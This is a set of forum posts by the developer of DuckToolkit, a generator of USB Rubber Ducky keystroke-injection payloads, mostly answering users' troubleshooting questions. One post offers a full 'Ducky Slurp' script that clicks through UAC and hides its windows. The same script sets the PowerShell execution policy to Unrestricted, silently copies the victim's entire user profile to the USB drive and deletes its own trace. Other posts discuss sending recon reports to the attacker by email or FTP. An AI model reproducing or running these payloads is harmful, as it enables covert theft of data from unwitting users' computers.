Posts posted by 411Hall
-
-
18 hours ago, monkeytrumpet said:
There's a slight bug in the copy to USB code... (in my case RECON is my alternative USB drive)
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq RECON} | Measure
should be
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'RECON'} | Measure
This can be fixed by putting the destination in '' but this isn't obvious. The same applies if putting a drive letter.
All fixed now, thank you for the heads up :)
-
16 hours ago, lilfear1 said:
I am still having the same issue that I was before...this page looked just like the one I used previously (just fyi)
What Language are you using?
ymode will appear when the commands ALT y, DELAY 1000, STRING mode con:cols=14 lines=1 are not recognised.
I have no idea why it's saying PowerShell.exe isn't a valid executable. Can you run it manually from Windows Key + R?
-
20 hours ago, NinjaDuck said:
Hi
Good work! Any hope for Swedish language support?
Thanks! Do any of the other encoders currently support the Swedish layout? If they do I can just modify it to work with the toolkit.
-
Hello everyone. Sorry for the delay in replies and issues with the previous site over the past few months.
I am happy to announce that the DuckToolkit NG is now available!
This is an entirely new version of the previous site which has been rewritten in Python/Django by myself and KevtheHermit.
Current Features:
- Online Encoder
- 30+ Recon/Exploit/Reporting PowerShell scripts
- Online Decoder
- UK/US Language Support
- Standalone Python Encoder/Decoder
We are working to add new languages and to implement Linux/OSX scripts in the coming weeks. However, since this is an open source project, please feel free to help us! If you want a certain language added then help us by writing it!
You can access the online DuckToolkit NG here:
You can access the standalone DuckToolkit here:
https://github.com/kevthehermit/DuckToolkit
Any issues, comments or suggestions then either post on the Disqus thread on the website or respond in this thread.
411.
-
Sorry for the downtime everyone. The old site is now back up.
I am working on a new site and have moved the old site to a new hosting provider and have had a few issues.
Hoping to have the new site up and running by April! It will be worth the wait!
411.
-
Hi 411, I have a problem similar to Nazgul's a couple of posts above. I would like to use my Ducky for light recon and have it email me a report. It opens and seems to run smooth (just testing Computer Information right now), it writes a .ps1 file to c:\windows but I don't think that I am getting a report.zip. The .ps1 doesn't delete itself and I never get my email. Would you look at my .bin and .txt too?
Hi mate, yeah no worries. Send me the .txt, .bin and .ps1 file and I will have a look. It might also be worth launching PowerShell.exe on your Windows box, navigating to the .ps1 file and attempting to run it from the command line. That will show you if there are any errors when it attempts to run.
I will be away for the weekend btw so won't be able to look until Monday.
Cheers,
411.
-
Hi 411,
I just created/corrected some issues that would be corrected in the next SVN for the es.properties of the 2.6.3 encoder.
Can you send me a PM with an e-mail where I can send you the es.properties file with the corrections?
Version 2.6.4 It's out ;)
Hi Ardetroya, sorry for not replying sooner, I have only just seen this post! Do you have a copy of the properties file? I will update asap.
Thanks,
411.
-
Just a heads up.
I have updated the encoder on the Toolkit to 2.6.3. Hoping this will fix the issues users have been having with the Encoder.
Any issues let me know.
411.
-
Yeah sorry about that, appears the site ran out of space even though that should never happen.
It's back up now.
411.
-
This is awesome! As it's Java based would you consider some type of collaboration so we could try and get this onto the Duck Toolkit? Obviously full credit would go to you!
-
I am having an issue creating a working payload ... I am new to the gear so please bear with me :)
I am trying to generate a very simple payload ... Just selecting Computer Info from RECON and Save to target for REPORT ... The Script seems to run fine on the target ... However after the command prompt closes I just have a PowerShell file on my desktop and NO c:\report.zip file .... What am I missing???
Hi nazgul, sorry you are having issues!
Would you mind sending the .txt and .bin payloads to ducktoolkit@outlook.com so I can have a look? There is definitely something wrong as the PowerShell file should be hidden in C:\Windows.
411.
-
Hi xyntax, sorry for the delay in my reply. I believe there is an issue with the Italian keyboard layout in the latest encoder as you are not the only person to report this to me.
The down arrows are there to pull the notepad off screen. The number of down arrows required to get the notepad off screen varies depending on screen resolution. Since I don't know the user's screen resolution I have included more than would probably be necessary to ensure the notepad is always hidden.
411.
-
Nice work, looks really extensive! Haven't got my ducky with me now but I will run it as soon as I get a chance.
411.
-
So did it not run?
What operating system are you running?
411.
-
-
The only payload that has worked is the Hello World payload, the rest will open random files and such.
Have you tried again since I added the new delay feature?
You now choose exactly how much delay is on each script. So maybe try setting it to the max to see if that runs? If it does then it has to be a timing issue.
411.
-
Hi guys!
So I'm deploying my Duck at work, and I have a script (Thanks to DuckToolKit) that saves the user and hardware info of their computer. We're doing an inventory basically.
The output of the script saves it as a Report.zip, but I have about 200 computers to go through. Is it possible to have an
IF 'Report.zip'=EXIST
Then EXIST +1
Basically if Report.zip exists , rename the file to Report1, and so on so the final will have Report, Report1, Report 2, etc.
Thanks!! I'll attach my script below:
In response to this, yes that wouldn't be a problem at all. I will probably append a time stamp to the report name so 'Report 08:00:00 07.05.2014.zip'. That work for you? I will make the changes over the next weekend.
As for PowerShell, as Merlintime has pointed out it's incredibly powerful and there are loads of ways you can remotely administer machines. When I was writing the Toolkit I discovered loads of awesome uses for it but I decided to leave remotely networked machines out of the scope as there are certain variables I wouldn't know. Anyway I have all of my PowerShell scripts minus the Duck code stored somewhere so if you want them let me know. Also let me know if you write anything you think could be a good payload. I'm always looking for new scripts!
411.
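A sketch of the report naming discussed in the post above, added here as an example and not taken from the DuckToolkit scripts. It assumes a colon-free timestamp, because ':' is not a valid character in a Windows file name, and adds the computer name so 200 inventory reports stay distinguishable; `Get-UniqueReportPath` and the demo folder are hypothetical names.

```powershell
# Added example (not DuckToolkit code): build a report path that cannot
# collide with an existing Report.zip. Get-UniqueReportPath is a
# hypothetical helper name.
function Get-UniqueReportPath {
    param(
        [Parameter(Mandatory)][string]$Directory,
        [string]$BaseName  = 'Report',
        [string]$Extension = '.zip'
    )

    # ':' is not allowed in Windows file names, so use a sortable,
    # colon-free timestamp instead of HH:mm:ss.
    $stamp = Get-Date -Format 'yyyyMMdd-HHmmss'
    $stem  = '{0}_{1}_{2}' -f $BaseName, $env:COMPUTERNAME, $stamp

    # Fall back to a numeric suffix if two reports land in the same second.
    $candidate = Join-Path $Directory ($stem + $Extension)
    $n = 1
    while (Test-Path -LiteralPath $candidate) {
        $candidate = Join-Path $Directory ('{0}_{1}{2}' -f $stem, $n, $Extension)
        $n++
    }
    return $candidate
}

# Constructed demo: two reports requested back to back get different names.
$dir = Join-Path $env:TEMP 'inventory-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null

$first = Get-UniqueReportPath -Directory $dir
New-Item -ItemType File -Path $first | Out-Null

$second = Get-UniqueReportPath -Directory $dir
"first : $first"
"second: $second"
```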
-
Hi, sorry for the delay in my reply.
So do you ever see notepad open and the script being typed out? If not I am thinking that the delay on the scripts may be too little and therefore the ducky is typing faster than the PC can handle. Let me know, I am working on a solution to this that should be released in a few weeks but there is a workaround we can do in the meantime.
411.
-
Used the format without the parentheses of course. Is there a trailing slash required or anything? When I input the FTP URL into a browser it leads me to the Index of / as expected. Shall I PM you the actual URL for the FTP server as it's strictly for the use of the Rubber Ducky and does not contain sensitive information as well as the fact that all the information can be simply changed?
Regards
No trailing slashes or anything needed. If you don't mind PMing me the details, that will probably be the quickest way to sort it.
Sorry about that
411.
-
So I've excitedly received my Rubber Ducky Exfiltrator and had a fantastic time loading a payload and running it. I'm slightly familiar with the Teensy 3.0 but it's been some time. So my question is, whenever and whatever format I enter into the Send to FTP I always get the error that the input line was incorrect.
The ol
Please ensure all variable fields are correctly filled in.
Please refer to the help section for more information on using the Payload Generator.
The help section wasn't very helpful or I'm very dense.
Please advise as to the "correct" way to enter an FTP machine.
The current format I use is as follows.
Regards,
Taco
Sorry about the issues mate. I just tried putting in:
ftp://username:pass@example.com
That worked fine for me. Are you by chance adding brackets on either side? If so don't! Not really too sure why I added them to the example tbh so I will remove them during the next update.
Hope that fixes it.
411.
-
I am having the same problem, and if I try to physically click no or yes the ducky doesn't finish the attack.
This won't let me paste the post this was referring to and I hit quote.....
Anyway the post I am referring to says that when I insert the ducky into my target computer then remove it, add another payload on the ducky and re-insert into the same target computer, it comes up with an error saying file already exists (can't think of the file atm sorry) but it goes on to ask if you want to replace it or not. I thought that file would be deleted showing no evidence of even being there. If I hit yes to override it the ducky doesn't finish the attack.
Also on another subject my SD that came with my ducky is also bad I have a 4Gb that seems to work though.
Sorry about that mate. It's exactly what Merlintime said, nice one btw! The PowerShell file which is created when the script is deployed is called config.ps1, this is saved in the C:\Windows folder. The file will erase itself after completion.
So the fact that it's still there means the script you ran before has either errored or hasn't completed. Have you by chance run the Twin Duck script? I seem to remember that doesn't finish for a very very long time even after a lot of the files have been copied to the USB.
Anyway it's a simple enough fix. I will make sure that future scripts overwrite the config.ps1 file if it's present. Should be able to push the changes out by the weekend.
Issue is now fixed.
Thanks for using the Toolkit and sorry about the issues.
411.
-
If you're interested I have a slightly different version of the Ducky Slurp. Same premise as Darren's and Overwraith's, just written in PowerShell.
DELAY 3000
GUI r
DELAY 750
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER
ALT SPACE
DELAY 100
STRING m
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\'
ENTER
STRING $usbPresent = 'False'
ENTER
STRING do {
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure
ENTER
STRING if ($present.Count -ge 1){
ENTER
STRING $usbPresent = 'True' }Else {
ENTER
STRING $usbPresent = 'False'}}
ENTER
STRING until ($usbPresent -eq 'True')
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name
ENTER
STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name
ENTER
STRING copy-item $userDir $usbPath.Name -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY 1500
STRING C:\Windows\config.ps1
ENTER
DELAY 2000
ALT F4
DELAY 200
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 100
STRING m
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1000
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER
There is also a USB Reporting method on the Duck Toolkit.
411.
-
Version 2 of the Duck Toolkit is now online!
v.2 Changes:
- New UI
- USB Reporting Payload
- Duck Slurp Payload
- Fixed Encoder Issues
- USB Recon Script Updated
- Fixed Other Backend Issues
Check it out at http://www.ducktoolkit.com
Feedback is always appreciated. Also I really want to get some fresh scripts on the site in the coming weeks so if anyone has any requests just message me.
Enjoy,
411.
-
I'm having trouble with this toolkit's email function. I always try to send all the reconnaissance info to an email address, but it never sends the email to the one i specified.
This is how the menu is setup for email recon (I'm certain you know how it looks anyway)
Reporting Scripts
Email Report via GMAIL
Email address to send report to: (name@gmail.com)
Email Username: (name)
Email Password: (Password123)
For example, the first box I fill in with: cgdcrew@gmail.com
The second box I fill out with: cgdcrew@gmail.com
And then the password for my gmail account.
I download the binary, put the inject.bin into the root of the Ducky, put it onto a test machine that I have, it writes and executes all code, but no email is sent to the specified address.
Is this a bug or am I doing something wrong? Thanks.
Hey mate,
Sorry about that. I have just tested the script and it worked for me, I am assuming you have checked Junk folders etc? (I have to ask)
I think you may be having one of two possible issues:
1. It's possible that the 'Report.zip' isn't ever being created so it can be uploaded and sent via email, that would cause the script to crash.
2. SMTP (port 25) may be blocked on your firewall which is preventing the script from being sent. However I have never had this issue and I have tried on several computers with different firewalls etc.
First thing I would try is disabling any firewalls etc and doing a test run, if the email arrives then problem sorted. Although I will need to fix that issue.
If that doesn't work then it's probably a 'Report.zip' issue. Could you try making a recon script and select the 'Save Report to Target Machine' option, enter a folder directory for the file to save to and run the script. That will let me know if the zip creation functionality is working on your computer.
Sorry for the issues,
411.
Duck toolkit encoder error
in Classic USB Rubber Ducky
Try the code below. If you're going to use CONTROL ALT with a command after, you need to shorten it to CTRL-ALT.
REM Logon
DELAY 4000
CTRL-ALT DELETE
STRING Computer_Password
ENTER
DELAY 500
REM Open Website
CTRL-ALT a
DELAY 500
REM Logon
STRING Username
TAB
STRING Site_Password
ENTER
DELAY 500
REM Maximize Screen
WINDOWS UPARROW